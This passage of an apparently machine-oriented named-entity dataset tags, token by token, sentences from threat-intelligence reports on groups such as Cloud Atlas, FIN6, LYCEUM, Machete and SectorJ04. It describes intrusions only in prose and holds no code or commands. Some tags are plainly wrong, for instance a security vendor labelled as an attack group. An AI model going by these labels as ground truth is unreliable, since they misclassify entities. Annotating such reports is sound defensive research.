+Networks O
+also O
+wrote O
+about O
+it O
+in O
+November B-TIME
+2018 E-TIME
+. O
+The O
+China B-FILE
+Chopper E-FILE
+actor O
+activity O
+starts O
+with O
+the O
+download O
+and O
+execution O
+of O
+two O
+exploit S-VULNAME
+files O
+which O
+attempt O
+to O
+exploit S-VULNAME
+the O
+Windows S-OS
+vulnerabilities O
+CVE-2015-0062 S-VULID
+, O
+CVE-2015-1701 S-VULID
+and O
+CVE-2016-0099 S-VULID
+to O
+allow O
+the O
+attacker S-APT
+to O
+modify O
+other O
+objects O
+on O
+the O
+server O
+. O
+Previously O
+, O
+Cloud B-APT
+Atlas E-APT
+dropped O
+its O
+validator” O
+implant O
+named O
+PowerShower” O
+directly O
+, O
+after O
+exploiting O
+the O
+Microsoft S-IDTY
+Equation O
+vulnerability O
+CVE-2017-11882 S-VULID
+mixed O
+with O
+CVE-2018-0802 S-VULID
+. O
+This O
+malware O
+has O
+been O
+used O
+since O
+October B-TIME
+2018 E-TIME
+by O
+Cloud B-APT
+Atlas E-APT
+as O
+a O
+validator O
+and O
+now O
+as O
+a O
+second O
+stage O
+. O
+Cloud B-APT
+Atlas E-APT
+remains O
+very O
+prolific O
+in O
+Eastern B-LOC
+Europe E-LOC
+and O
+Central B-LOC
+Asia E-LOC
+. O
+During O
+its O
+recent O
+campaigns O
+, O
+Cloud B-APT
+Atlas E-APT
+used O
+a O
+new O
+polymorphic” O
+infection B-ACT
+chain E-ACT
+relying O
+no O
+more O
+on O
+PowerShower O
+directly O
+after O
+infection O
+, O
+but O
+executing O
+a O
+polymorphic O
+HTA O
+hosted O
+on O
+a O
+remote O
+server O
+, O
+which O
+is O
+used O
+to O
+drop O
+three O
+different O
+files O
+on O
+the O
+local O
+system O
+. O
+The O
+Gamaredon B-APT
+Group E-APT
+has O
+been O
+actively O
+launching O
+spear-phishing S-ACT
+attacks E-ACT
+against O
+Ukrainian S-LOC
+government S-IDTY
+and O
+military S-IDTY
+departments O
+from O
+the O
+mid-2013s S-TIME
+. O
+In O
+addition O
+, O
+the O
+anonymous O
+cybersecurity O
+experts O
+referenced O
+in O
+the O
+article O
+connected O
+the O
+malicious O
+Gamaredon B-APT
+Group E-APT
+actors O
+with O
+Russian S-LOC
+state-sponsored O
+hackers O
+. O
+In O
+one O
+article O
+published O
+in O
+the O
+Kharkiv O
+Observer O
+– O
+an O
+independent O
+Ukranian S-LOC
+online O
+publication O
+– O
+an O
+unnamed O
+source O
+stated O
+that O
+even O
+the O
+Ukrainian O
+Presidential B-IDTY
+Administration E-IDTY
+has O
+been O
+attacked O
+by O
+malware O
+developed O
+by O
+the O
+Gamaredon B-APT
+Group E-APT
+. O
+Gamaredon B-APT
+Group E-APT
+primarily O
+target O
+Ukrainian O
+organizations S-IDTY
+and O
+resources O
+using O
+spear-phishing S-ACT
+attacks O
+, O
+and O
+they O
+use O
+military O
+or O
+similar O
+documents S-MAL
+as O
+bait O
+. O
+Once O
+they S-APT
+have O
+found O
+a O
+victim O
+, O
+they O
+then O
+deploy O
+remote O
+manipulation O
+system O
+binaries O
+(RMS) S-MAL
+via O
+self-extracting O
+archives O
+and O
+batch O
+command O
+files O
+. O
+The O
+following O
+archive S-FILE
+caught O
+our O
+attention O
+for O
+exploiting O
+a O
+WinRAR S-TOOL
+unacev2 O
+module O
+vulnerability S-VULNAME
+and O
+for O
+having O
+interesting O
+content O
+. O
+During O
+a O
+recent O
+incident O
+response O
+investigation O
+, O
+our O
+team O
+identified O
+new O
+attacks O
+by O
+the O
+financially O
+motivated O
+attack O
+group O
+ITG08 S-APT
+, O
+also O
+known O
+as O
+FIN6 S-APT
+. O
+More O
+recently O
+, O
+ITG08 S-APT
+has O
+been O
+observed O
+targeting O
+e-commerce B-IDTY
+environments E-IDTY
+by O
+injecting B-ACT
+malicious I-ACT
+code E-ACT
+into O
+online O
+checkout O
+pages O
+of O
+compromised O
+websites O
+— O
+a O
+technique O
+known O
+as O
+online O
+skimming O
+— O
+thereby O
+stealing O
+payment O
+card O
+data O
+transmitted O
+to O
+the O
+vendor O
+by O
+unsuspecting O
+customers O
+. O
+This O
+tool O
+, O
+a O
+TTP O
+observed O
+in O
+ITG08 S-APT
+attacks O
+since O
+2018 S-TIME
+, O
+is O
+sold O
+on O
+the O
+dark O
+web O
+by O
+an O
+underground O
+malware-as-a-service O
+(MaaS) O
+provider O
+. O
+ITG08 S-APT
+is O
+an O
+organized O
+cybercrime O
+gang O
+that O
+has O
+been O
+active O
+since O
+2015 S-TIME
+, O
+mostly O
+targeting O
+pointof-sale O
+(POS) O
+machines O
+in O
+brick-and-mortar O
+retailers S-IDTY
+and O
+companies O
+in O
+the O
+hospitality B-IDTY
+sector E-IDTY
+in O
+the B-LOC
+U.S. E-LOC
+and O
+Europe S-LOC
+. O
+Past O
+campaigns O
+by O
+ITG08 S-APT
+using O
+the O
+More_eggs B-MAL
+backdoor E-MAL
+were O
+last O
+reported O
+in O
+February B-TIME
+2019 E-TIME
+. O
+Attackers S-APT
+use O
+it O
+to O
+create O
+, O
+expand S-ACT
+and O
+cement S-ACT
+their O
+foothold O
+in O
+compromised O
+environments O
+. O
+Lastly O
+, O
+ITG08 S-APT
+used O
+Comodo B-MAL
+code-signing I-MAL
+certificates E-MAL
+several O
+times O
+during O
+the O
+course O
+of O
+the O
+campaign O
+. O
+Let’s O
+take O
+a O
+closer O
+look O
+at O
+ITG08’s S-APT
+TTPs O
+that O
+are O
+relevant O
+to O
+the O
+campaign O
+we O
+investigated O
+, O
+starting O
+with O
+its O
+spear B-ACT
+phishing E-ACT
+and O
+intrusion B-ACT
+tactics E-ACT
+and O
+covering B-ACT
+information E-ACT
+on O
+its O
+use O
+of O
+the O
+More_eggs B-FILE
+backdoor E-FILE
+. O
+Additional O
+capabilities O
+of O
+the O
+More_eggs B-FILE
+malware E-FILE
+include O
+the O
+download O
+and O
+execution O
+of O
+files O
+and O
+scripts O
+and O
+running O
+commands O
+using O
+cmd.exe S-FILE
+. O
+X-Force B-SECTEAM
+IRIS E-SECTEAM
+determined O
+that O
+the O
+More_eggs B-FILE
+backdoor E-FILE
+later O
+downloaded O
+additional O
+files O
+, O
+including O
+a O
+signed O
+binary O
+shellcode O
+loader O
+and O
+a O
+signed O
+Dynamic B-TOOL
+Link I-TOOL
+Library E-TOOL
+( O
+DLL S-TOOL
+) O
+, O
+as O
+described O
+below O
+, O
+to O
+create O
+a O
+reverse O
+shell O
+and O
+connect O
+to O
+a O
+remote O
+host O
+. O
+Once O
+the O
+ITG08 S-APT
+established O
+a O
+foothold O
+on O
+the O
+network O
+, O
+they O
+employed O
+WMI S-MAL
+and O
+PowerShell S-MAL
+techniques O
+to O
+perform O
+network O
+reconnaissance O
+and O
+move O
+laterally O
+within O
+the O
+environment O
+. O
+The O
+attackers S-APT
+used O
+this O
+technique O
+to O
+remotely O
+install S-ACT
+a O
+Metasploit O
+reverse O
+TCP S-PROT
+stager O
+on O
+select O
+systems O
+, O
+subsequently O
+spawning O
+a O
+Meterpreter O
+session O
+and O
+Mimikatz O
+. O
+In O
+addition O
+to O
+the O
+More_eggs S-MAL
+malware O
+, O
+ITG08 S-APT
+leveraged O
+in-memory O
+attacks O
+by O
+injecting O
+malicious O
+code O
+, O
+in O
+this O
+case O
+Mimikatz S-MAL
+, O
+into O
+legitimate O
+system O
+processes O
+. O
+A O
+recently O
+rising O
+attack O
+tool O
+in O
+ITG08 S-APT
+campaigns O
+has O
+been O
+the O
+More_eggs B-MAL
+JScript I-MAL
+backdoor E-MAL
+. O
+Mimikatz S-FILE
+is O
+a O
+post-exploitation O
+tool O
+that O
+allows O
+attackers O
+to O
+extract O
+credentials O
+from O
+volatile O
+memory O
+. O
+After O
+a O
+successful O
+phishing E-ACT
+attack O
+in O
+which O
+users O
+have O
+opened O
+emails S-TOOL
+and O
+browsed O
+to O
+malicious O
+links O
+, O
+ITG08 S-APT
+attackers O
+install S-ACT
+the O
+More_eggs B-MAL
+JScript I-MAL
+backdoor E-MAL
+on O
+user O
+devices O
+alongside O
+several O
+other O
+malware O
+components O
+. O
+Beyond O
+using O
+More_eggs S-MAL
+as O
+a O
+backdoor O
+, O
+ITG08 S-APT
+in O
+this O
+campaign O
+also O
+used O
+offensive B-MAL
+security I-MAL
+tools E-MAL
+and O
+PowerShell B-MAL
+scripts E-MAL
+to O
+carry O
+out O
+the O
+different O
+stages O
+of O
+the O
+attack O
+. O
+After O
+injecting B-ACT
+Meterpreter E-ACT
+into O
+memory O
+, O
+the O
+attacker S-APT
+had O
+complete O
+control O
+of O
+the O
+infected O
+device O
+. O
+IBM B-SECTEAM
+X-Force I-SECTEAM
+IRIS E-SECTEAM
+has O
+gained O
+insight O
+into O
+ITG08’s S-APT
+intrusion O
+methods O
+, O
+ability O
+to O
+navigate O
+laterally O
+, O
+use O
+of O
+custom O
+and O
+open-source O
+tools S-MAL
+, O
+and O
+typical O
+persistence O
+mechanisms O
+. O
+After O
+the O
+phishing B-ACT
+email E-ACT
+resulted O
+in O
+a O
+successful O
+infiltration O
+, O
+ITG08 S-APT
+used O
+the O
+More_eggs B-MAL
+backdoor E-MAL
+to O
+gain O
+a O
+foothold O
+and O
+infect O
+additional O
+devices O
+. O
+In O
+addition O
+, O
+configuring O
+PowerShell S-TOOL
+script O
+logging O
+and O
+identifying O
+any O
+obfuscation O
+will O
+assist O
+in O
+mitigating O
+ITG08’s S-APT
+use O
+of O
+PowerShell S-MAL
+to O
+conduct O
+malicious O
+activity O
+. O
+The O
+LYCEUM S-APT
+threat O
+group O
+targets O
+organizations O
+in O
+sectors O
+of O
+strategic B-IDTY
+national I-IDTY
+importance E-IDTY
+, O
+including O
+oil B-IDTY
+and I-IDTY
+gas E-IDTY
+and O
+possibly O
+telecommunications S-IDTY
+. O
+CTU S-SECTEAM
+research O
+indicates O
+that O
+LYCEUM S-APT
+may O
+have O
+been O
+active O
+as O
+early O
+as O
+April B-TIME
+2018 E-TIME
+. O
+In O
+May B-TIME
+2019 E-TIME
+, O
+the O
+threat O
+group O
+launched O
+a O
+campaign O
+against O
+oil O
+and O
+gas O
+organizations O
+in O
+the O
+Middle B-LOC
+East E-LOC
+. O
+This O
+campaign O
+followed O
+a O
+sharp O
+uptick O
+in O
+development O
+and O
+testing O
+of O
+their O
+toolkit O
+against O
+a O
+public O
+multivendor O
+malware O
+scanning O
+service O
+in O
+February B-TIME
+2019 E-TIME
+. O
+Stylistically O
+, O
+the O
+observed O
+tradecraft O
+resembles O
+activity O
+from O
+groups O
+such O
+as O
+COBALT B-APT
+GYPSY E-APT
+(which O
+is O
+related O
+to O
+OilRig S-APT
+, O
+Crambus S-APT
+, O
+and O
+APT34 S-APT
+and O
+COBALT B-APT
+TRINITY E-APT
+also O
+known O
+as O
+Elfin S-APT
+and O
+APT33 S-APT
+. O
+When O
+CTU S-SECTEAM
+researchers O
+first O
+published O
+information O
+about O
+LYCEUM S-APT
+to O
+Secureworks O
+Threat O
+Intelligence O
+clients O
+, O
+no O
+public O
+documentation O
+on O
+the O
+group O
+existed O
+. O
+Using O
+compromised O
+accounts O
+, O
+LYCEUM S-APT
+send O
+spearphishing B-ACT
+emails S-TOOL
+with O
+malicious O
+Excel O
+attachments O
+to O
+deliver S-ACT
+the O
+DanBot O
+malware O
+, O
+which O
+subsequently O
+deploys O
+post-intrusion B-MAL
+tools E-MAL
+. O
+The O
+developer O
+consistently O
+used O
+Accept-Enconding” O
+(note O
+the O
+extra O
+‘n’) O
+in O
+all O
+DanBot S-FILE
+samples O
+analyzed O
+by O
+CTU S-SECTEAM
+researchers O
+. O
+Get-LAPSP.ps1 S-MAL
+is O
+a O
+PowerShell B-MAL
+script E-MAL
+that O
+gathers O
+account O
+information O
+from O
+Active O
+Directory O
+via O
+LDAP O
+. O
+LYCEUM S-APT
+deployed O
+this O
+tool O
+via O
+DanBot S-MAL
+shortly O
+after O
+gaining O
+initial O
+access O
+to O
+a O
+compromised O
+environment O
+. O
+LYCEUM S-APT
+delivers O
+weaponized O
+maldocs S-MAL
+via O
+spearphishing S-ACT
+from O
+the O
+compromised O
+accounts O
+to O
+the O
+targeted O
+executives O
+, O
+human O
+resources O
+(HR) O
+staff O
+, O
+and O
+IT O
+personnel O
+. O
+This O
+focus O
+on O
+training O
+aligns O
+with O
+LYCEUM’s S-APT
+targeting O
+of O
+executives S-IDTY
+, O
+HR B-IDTY
+staff E-IDTY
+, O
+and O
+IT B-IDTY
+personnel E-IDTY
+. O
+Despite O
+the O
+initial O
+perception O
+that O
+the O
+maldoc S-MAL
+sample O
+was O
+intended O
+for O
+ICS S-IDTY
+or O
+OT B-IDTY
+staff E-IDTY
+, O
+LYCEUM S-APT
+has O
+not O
+demonstrated O
+an O
+interest O
+in O
+those O
+environments O
+. O
+However O
+, O
+CTU S-SECTEAM
+researchers O
+cannot O
+dismiss O
+the O
+possibility O
+that O
+the O
+LYCEUM S-APT
+could O
+seek O
+access O
+to O
+OT O
+environments O
+after O
+establishing O
+robust O
+access O
+to O
+the O
+IT O
+environment O
+. O
+LYCEUM S-APT
+is O
+an O
+emerging O
+threat O
+to O
+energy B-IDTY
+organizations E-IDTY
+in O
+the O
+Middle B-LOC
+East E-LOC
+, O
+but O
+organizations O
+should O
+not O
+assume O
+that O
+future O
+targeting O
+will O
+be O
+limited O
+to O
+this O
+sector O
+. O
+Aside O
+from O
+deploying O
+novel O
+malware O
+, O
+LYCEUM’s S-APT
+activity O
+demonstrates O
+capabilities O
+CTU S-SECTEAM
+researchers O
+have O
+observed O
+from O
+other O
+threat O
+groups O
+and O
+reinforces O
+the O
+value O
+of O
+a O
+few O
+key O
+controls O
+. O
+Password B-ACT
+spraying E-ACT
+, O
+DNS B-ACT
+tunneling E-ACT
+, O
+social B-ACT
+engineering E-ACT
+, O
+and O
+abuse S-ACT
+of O
+security O
+testing O
+frameworks O
+are O
+common O
+tactics O
+, O
+particularly O
+from O
+threat O
+groups S-APT
+operating O
+in O
+the O
+Middle B-LOC
+East E-LOC
+. O
+The O
+group O
+behind O
+these O
+attacks O
+has O
+stolen O
+gigabytes O
+of O
+confidential O
+documents O
+, O
+mostly O
+from O
+military S-IDTY
+organizations S-IDTY
+. O
+Machete S-APT
+is O
+still O
+very O
+active O
+at O
+the O
+time O
+of O
+this O
+publication O
+, O
+regularly O
+introducing O
+changes O
+to O
+its O
+malware S-MAL
+, O
+infrastructure O
+and O
+spearphishing S-ACT
+campaigns O
+. O
+ESET S-SECTEAM
+has O
+been O
+tracking O
+a O
+new O
+version O
+of O
+Machete S-APT
+(the O
+group’s O
+Python-based S-TOOL
+toolset) O
+that O
+was O
+first O
+seen O
+in O
+April B-TIME
+2018 E-TIME
+. O
+This O
+extends O
+to O
+other O
+countries O
+in O
+Latin B-LOC
+America E-LOC
+, O
+with O
+the O
+Ecuadorean B-IDTY
+military E-IDTY
+being O
+another O
+organization O
+highly O
+targeted O
+with O
+the O
+Machete S-APT
+malware O
+. O
+Their S-APT
+long O
+run O
+of O
+attacks O
+, O
+focused O
+on O
+Latin B-LOC
+American E-LOC
+countries O
+, O
+has O
+allowed O
+them O
+to O
+collect O
+intelligence O
+and O
+refine O
+their O
+tactics O
+over O
+the O
+years O
+. O
+Machete S-APT
+is O
+interested O
+in O
+files O
+that O
+describe B-IDTY
+navigation I-IDTY
+routes E-IDTY
+and O
+positioning O
+using O
+military O
+grids O
+. O
+The O
+Machete S-APT
+group O
+sends S-ACT
+very O
+specific O
+emails S-TOOL
+directly O
+to O
+its O
+victims O
+, O
+and O
+these O
+change O
+from O
+target O
+to O
+target O
+. O
+The O
+Machete S-APT
+group O
+is O
+very O
+active O
+and O
+has O
+introduced O
+several O
+changes O
+to O
+its O
+malware O
+since O
+a O
+new O
+version O
+was O
+released O
+in O
+April B-TIME
+2018 E-TIME
+. O
+Previous B-FILE
+versions E-FILE
+were O
+described O
+by O
+Kaspersky S-SECTEAM
+in O
+2014 S-TIME
+and O
+Cylance S-APT
+in O
+2017 S-TIME
+. O
+Since O
+August B-TIME
+2018 E-TIME
+, O
+the O
+Machete S-APT
+components O
+have O
+been O
+delivered O
+with O
+an O
+extra O
+layer O
+of O
+obfuscation O
+. O
+The O
+GoogleUpdate.exe S-FILE
+component O
+is O
+responsible O
+for O
+communicating O
+with O
+the O
+remote O
+C&C S-TOOL
+server O
+. O
+ESET S-SECTEAM
+has O
+been O
+tracking O
+this O
+threat O
+for O
+months O
+and O
+has O
+observed O
+several O
+changes O
+, O
+sometimes O
+within O
+weeks O
+. O
+This O
+ACT O
+, O
+the O
+malware S-FILE
+can O
+have O
+its O
+configuration O
+, O
+malicious O
+binaries O
+and O
+file O
+listings O
+updated O
+, O
+but O
+can O
+also O
+download O
+and O
+execute O
+other O
+binaries O
+. O
+The O
+presence O
+of O
+code O
+to O
+exfiltrate O
+data O
+to O
+removable O
+drives O
+when O
+there O
+is O
+physical O
+access O
+to O
+a O
+compromised O
+computer O
+may O
+indicate O
+that O
+Machete S-APT
+operators O
+could O
+have O
+a O
+presence O
+in O
+one O
+of O
+the O
+targeted B-LOC
+countries E-LOC
+, O
+although O
+we O
+cannot O
+be O
+certain O
+. O
+This O
+group O
+is O
+very O
+active O
+and O
+continues O
+to O
+develop O
+new O
+features O
+for O
+its O
+malware O
+, O
+and O
+implement O
+infrastructure O
+changes O
+in O
+2019 S-TIME
+. O
+Machete's S-APT
+long O
+run O
+of O
+attacks O
+, O
+focused O
+in O
+Latin B-LOC
+American E-LOC
+countries O
+, O
+has O
+allowed O
+them O
+to O
+collect O
+intelligence O
+and O
+refine O
+their O
+tactics O
+over O
+the O
+years O
+. O
+ESET S-SECTEAM
+researchers O
+have O
+detected O
+an O
+ongoing O
+, O
+highly O
+targeted O
+campaign O
+, O
+with O
+a O
+majority O
+of O
+the O
+targets O
+being O
+military S-IDTY
+organizations O
+. O
+The O
+group O
+behind O
+Machete S-APT
+uses O
+effective O
+spearphishing S-ACT
+techniques O
+. O
+First O
+described O
+by O
+Kaspersky S-SECTEAM
+in O
+2014 O
+[1] O
+and O
+later O
+, O
+by O
+Cylance S-SECTEAM
+in O
+2017 O
+[2] O
+, O
+Machete S-APT
+is O
+a O
+piece O
+of O
+malware O
+found O
+to O
+be O
+targeting O
+high O
+profile O
+individuals O
+and O
+organizations O
+in O
+Latin B-LOC
+American E-LOC
+countries O
+. O
+In O
+2018 S-TIME
+Machete S-APT
+reappeared O
+with O
+new O
+code O
+and O
+new O
+features O
+. O
+As O
+of O
+June B-TIME
+2019 E-TIME
+, O
+ESET S-SECTEAM
+has O
+seen O
+over O
+50 O
+victims O
+being O
+actively O
+spied O
+upon O
+by O
+Machete S-APT
+, O
+with O
+more O
+than O
+half O
+of O
+them O
+being O
+computers O
+belonging O
+to O
+the O
+Venezuelan O
+military S-IDTY
+forces O
+. O
+Machete S-APT
+has O
+Latin B-LOC
+American E-LOC
+targets O
+and O
+has O
+been O
+developed O
+by O
+a O
+Spanish-speaking S-LOC
+group O
+, O
+presumably O
+from O
+a O
+LATAM S-LOC
+country O
+. O
+Machete S-APT
+was O
+active O
+and O
+constantly O
+working O
+on O
+very O
+effective O
+spearphishing S-ACT
+campaigns S-ACT
+. O
+In O
+some O
+cases O
+, O
+Machete S-APT
+trick O
+new O
+victims O
+by O
+sending B-ACT
+real I-ACT
+documents E-ACT
+that O
+had O
+been O
+stolen O
+on O
+the O
+very O
+same O
+day O
+. O
+Machete S-APT
+relies O
+on O
+spearphishing S-ACT
+to O
+compromise O
+its O
+targets O
+. O
+They S-APT
+seem O
+to O
+have O
+specialized O
+knowledge O
+about O
+military S-IDTY
+operations O
+, O
+as O
+they O
+are O
+focused O
+on O
+stealing O
+specific O
+files O
+such O
+as O
+those O
+that O
+describe O
+navigation O
+routes O
+. O
+Attackers S-APT
+take O
+advantage O
+of O
+that O
+, O
+along O
+with O
+their O
+knowledge O
+of O
+military S-IDTY
+jargon O
+and O
+etiquette O
+, O
+to O
+craft O
+very O
+convincing O
+phishing B-ACT
+emails S-TOOL
+. O
+Operators O
+behind O
+Machete S-APT
+apparently O
+already O
+have O
+information O
+about O
+individuals O
+or O
+organizations O
+of O
+interest O
+to O
+them O
+in O
+Latin B-LOC
+America E-LOC
+, O
+how O
+to O
+reach O
+them O
+, O
+and O
+how O
+best O
+to O
+trick O
+them O
+into O
+getting O
+compromised O
+. O
+Since O
+the O
+end O
+of O
+March O
+up O
+until O
+the O
+end O
+of O
+May B-TIME
+2019 E-TIME
+, O
+ESET S-SECTEAM
+observed O
+that O
+there O
+were O
+more O
+than O
+50 O
+victimized S-ACT
+computers S-ACT
+actively O
+communicating O
+with O
+the O
+C&C S-TOOL
+server O
+. O
+This O
+extends O
+to O
+other O
+countries O
+in O
+Latin B-LOC
+America E-LOC
+, O
+with O
+the O
+Ecuadorean O
+military S-IDTY
+being O
+another O
+organization O
+highly O
+targeted O
+by O
+Machete S-APT
+. O
+Machete S-APT
+is O
+malware O
+that O
+has O
+been O
+developed O
+and O
+is O
+actively O
+maintained O
+by O
+a O
+Spanish-speaking S-LOC
+group O
+. O
+Since O
+it O
+was O
+active O
+in O
+2012 S-TIME
+, O
+it O
+has O
+been O
+carrying O
+out O
+attacks O
+against O
+sensitive O
+targets O
+in O
+China S-LOC
+and O
+is O
+one O
+of O
+the O
+most O
+active O
+APT O
+attack O
+organizations S-IDTY
+targeting O
+mainland O
+China S-LOC
+in O
+recent O
+years O
+. O
+By O
+introducing B-ACT
+small I-ACT
+changes E-ACT
+to O
+their O
+code O
+and O
+infrastructure O
+, O
+the O
+group O
+has O
+bypassed O
+several O
+security O
+products O
+. O
+OceanLotus S-APT
+will O
+release B-ACT
+malicious E-ACT
+sub-packages O
+in O
+the O
+background O
+, O
+receive S-ACT
+the O
+remote O
+control O
+command O
+, O
+steal S-ACT
+the O
+privacy O
+information O
+of O
+users O
+such O
+as O
+SMS O
+messages O
+, O
+contacts O
+, O
+call O
+records O
+, O
+geographic O
+locations O
+, O
+and O
+browser O
+records O
+. O
+They S-FILE
+also O
+download O
+apks O
+secretly O
+and O
+record O
+audios O
+and O
+videos O
+, O
+then O
+upload O
+users’ O
+privacy O
+information O
+to O
+server O
+, O
+causing O
+users’ O
+privacy O
+leakage O
+. O
+It O
+can O
+be O
+seen O
+that O
+after O
+the O
+code O
+leakage O
+, O
+the O
+CEO O
+of O
+the O
+HackingTeam S-APT
+organization O
+said O
+that O
+the O
+leaked B-ACT
+code E-ACT
+is O
+only O
+a O
+small O
+part O
+is O
+based O
+on O
+the O
+facts O
+, O
+which O
+also O
+reflects O
+that O
+the O
+network O
+arms O
+merchants O
+have O
+lowered O
+the O
+threshold O
+of O
+APT B-ACT
+attacks E-ACT
+to O
+a O
+certain O
+extent O
+, O
+making O
+more O
+uncertainties O
+of O
+cyber O
+attacks O
+. O
+This O
+report S-SECTEAM
+includes O
+details O
+related O
+to O
+the O
+major O
+hacking O
+targets O
+of O
+the O
+SectorJ04 S-APT
+group O
+in O
+2019 S-TIME
+, O
+how O
+those O
+targets O
+were O
+hacked O
+, O
+characteristics O
+of O
+their O
+hacking O
+activities O
+this O
+year O
+and O
+recent O
+cases O
+of O
+the O
+SectorJ04 S-APT
+group’s O
+hacking O
+. O
+In O
+2019 S-TIME
+, O
+the O
+SectorJ04 S-APT
+group O
+expanded O
+its O
+hacking O
+activities O
+to O
+cover O
+various O
+industrial B-IDTY
+sectors E-IDTY
+located O
+across O
+Southeast B-LOC
+Asia E-LOC
+and O
+East B-LOC
+Asia E-LOC
+, O
+and O
+is O
+changing O
+the O
+pattern O
+of O
+their O
+attacks O
+from O
+targeted O
+attacks O
+to O
+searching O
+for O
+random O
+victims O
+. O
+The O
+SectorJ04 S-APT
+group O
+has O
+maintained O
+the O
+scope O
+of O
+its O
+existing O
+hacking O
+activities O
+while O
+expanding O
+its O
+hacking O
+activities O
+to O
+companies O
+in O
+various O
+industrial O
+sectors O
+located O
+in O
+East B-LOC
+Asia E-LOC
+and O
+Southeast B-LOC
+Asia E-LOC
+. O
+There O
+was O
+a O
+significant O
+increase O
+in O
+SectorJ04's S-APT
+hacking O
+activities O
+in O
+2019 S-TIME
+, O
+especially O
+those O
+targeting O
+South B-LOC
+Korea E-LOC
+. O
+They O
+mainly O
+utilize B-ACT
+spam I-ACT
+email E-ACT
+to O
+deliver O
+their O
+backdoor O
+to O
+the O
+infected O
+system O
+that O
+can O
+perform O
+additional O
+commands O
+from O
+the O
+attacker’s S-APT
+server O
+. O
+We O
+saw O
+SectorJ04 S-APT
+group O
+activity O
+in O
+Germany S-LOC
+, O
+Indonesia S-LOC
+, O
+the S-LOC
+United S-LOC
+States S-LOC
+, O
+Taiwan S-LOC
+, O
+India S-LOC
+. O
+The O
+SectorJ04 S-APT
+group O
+mainly O
+utilizes O
+a O
+spear B-ACT
+phishing I-ACT
+email E-ACT
+with O
+MS O
+Word S-TOOL
+or O
+Excel O
+files O
+attached O
+, O
+and O
+the O
+document B-FILE
+files E-FILE
+downloads O
+the O
+Microsoft S-IDTY
+Installer O
+(MSI) O
+installation O
+file O
+from O
+the O
+attacker S-APT
+server O
+and O
+uses O
+it O
+to O
+install O
+backdoor O
+on O
+the O
+infected O
+system O
+. O
+The O
+SectorJ04 S-APT
+group’s O
+preexisting O
+targets O
+were O
+financial B-IDTY
+institutions E-IDTY
+located O
+in O
+countries O
+such O
+as O
+North B-LOC
+America E-LOC
+and O
+Europe S-LOC
+, O
+or O
+general O
+companies O
+such O
+as O
+retail O
+and O
+manufacturing O
+, O
+but O
+they O
+recently O
+expanded O
+their O
+LOCs O
+of O
+activity O
+to O
+include O
+the O
+medical S-IDTY
+, O
+pharmaceutical S-IDTY
+, O
+media S-IDTY
+, O
+energy S-IDTY
+and O
+manufacturing S-IDTY
+industries O
+. O
+The O
+SectorJ04 S-APT
+group O
+mainly O
+used O
+their O
+own O
+backdoor O
+, O
+ServHelper S-MAL
+and O
+FlawedAmmy B-MAL
+RAT E-MAL
+, O
+for O
+hacking O
+. O
+
+Backdoors O
+are O
+installed O
+in O
+infected O
+systems O
+and O
+SectorJ04 S-APT
+also O
+distributed O
+email S-TOOL
+stealers O
+, O
+botnet O
+malware O
+and O
+ransomware O
+through O
+those O
+backdoors S-MAL
+. O
+Backdoor S-FILE
+installed O
+in O
+the O
+infected O
+system O
+distributed O
+additional B-ACT
+botnet E-ACT
+malware O
+, O
+ransomware S-ACT
+and O
+email S-ACT
+stealers S-ACT
+. O
+SectorJ04 S-APT
+was O
+recently O
+confirmed O
+to O
+use O
+additional O
+backdoor O
+called O
+AdroMut S-MAL
+and O
+FlowerPippi S-MAL
+, O
+which O
+is O
+used O
+to O
+install O
+other O
+backdoor O
+such O
+as O
+FlawedAmmy O
+RAT O
+on O
+behalf O
+of O
+the O
+MSI O
+file O
+, O
+or O
+to O
+collect O
+system O
+information O
+and O
+send O
+it O
+to O
+the O
+attacker’s S-APT
+server O
+. O
+Although O
+the O
+SectorJ04 S-APT
+group O
+mainly O
+targeted O
+countries O
+located O
+in O
+Europe S-LOC
+or O
+North B-LOC
+America E-LOC
+, O
+it O
+has O
+recently O
+expanded O
+its O
+field O
+of O
+activities O
+to O
+countries O
+located O
+in O
+Southeast B-LOC
+Asia E-LOC
+and O
+East B-LOC
+Asia E-LOC
+. O
+The O
+email B-FILE
+stealer E-FILE
+collects O
+connection O
+protocol O
+information O
+and O
+account O
+information O
+, O
+such O
+as O
+SMTP S-PROT
+, O
+IMAP S-PROT
+, O
+and O
+POP3 S-PROT
+, O
+which O
+are O
+stored O
+in O
+the O
+registry O
+by O
+Outlook S-TOOL
+and O
+Thunderbird S-TOOL
+mail O
+clients O
+and O
+sends O
+them O
+to O
+the O
+attacker O
+server O
+in O
+a O
+specific O
+format O
+. O
+A O
+new O
+type O
+of O
+backdoor O
+called O
+AdroMut S-MAL
+and O
+a O
+new O
+malware O
+called O
+FlowerPippi S-MAL
+was O
+also O
+found O
+coming O
+from O
+SectorJ04 S-APT
+. O
+But O
+after O
+2019 S-TIME
+SectorJ04 S-APT
+has O
+changed O
+its O
+hacking O
+strategy O
+to O
+attack O
+using O
+spam S-ACT
+email S-ACT
+. O
+The O
+hacking O
+activities O
+of O
+SectorJ04 S-APT
+group O
+, O
+which O
+targeted O
+South B-LOC
+Korea E-LOC
+in O
+the O
+first O
+half O
+of O
+2019 S-TIME
+, O
+have O
+been O
+continuously O
+discovered O
+. O
+Prior O
+to O
+2019 O
+, O
+the O
+SectorJ04 S-APT
+group O
+conducted O
+large-scale O
+hacking O
+activities O
+for O
+financial O
+gain O
+using O
+exploit B-MAL
+kits E-MAL
+on O
+websites O
+to O
+install O
+ransomware O
+, O
+such O
+as O
+Locky S-MAL
+and O
+GlobeImporter S-MAL
+, O
+along O
+with O
+its O
+banking S-IDTY
+Trojan S-MAL
+, O
+on O
+its O
+victims O
+computers O
+. O
+In O
+June O
+2019 O
+, O
+continuous O
+SectorJ04's S-APT
+activities O
+targeting O
+South B-LOC
+Korea E-LOC
+were O
+found O
+again O
+and O
+spam O
+emails S-TOOL
+were O
+written O
+with O
+various O
+contents O
+, O
+including O
+transaction O
+statements O
+, O
+receipts O
+and O
+remittance O
+cards O
+. O
+The O
+SectorJ04 S-APT
+group O
+has O
+carried O
+out O
+large-scale O
+hacking O
+activities O
+targeting O
+South B-LOC
+Korea E-LOC
+, O
+while O
+also O
+expanding O
+the O
+field O
+of O
+attacks O
+to O
+Southeast B-LOC
+Asian E-LOC
+countries O
+such O
+as O
+Taiwan S-LOC
+and O
+the O
+Philippines S-LOC
+. O
+In O
+June S-TIME
+, O
+SectorJ04 S-APT
+group O
+conducted O
+hacking O
+using O
+spam O
+emails S-TOOL
+written O
+in O
+various O
+languages O
+, O
+including O
+English O
+, O
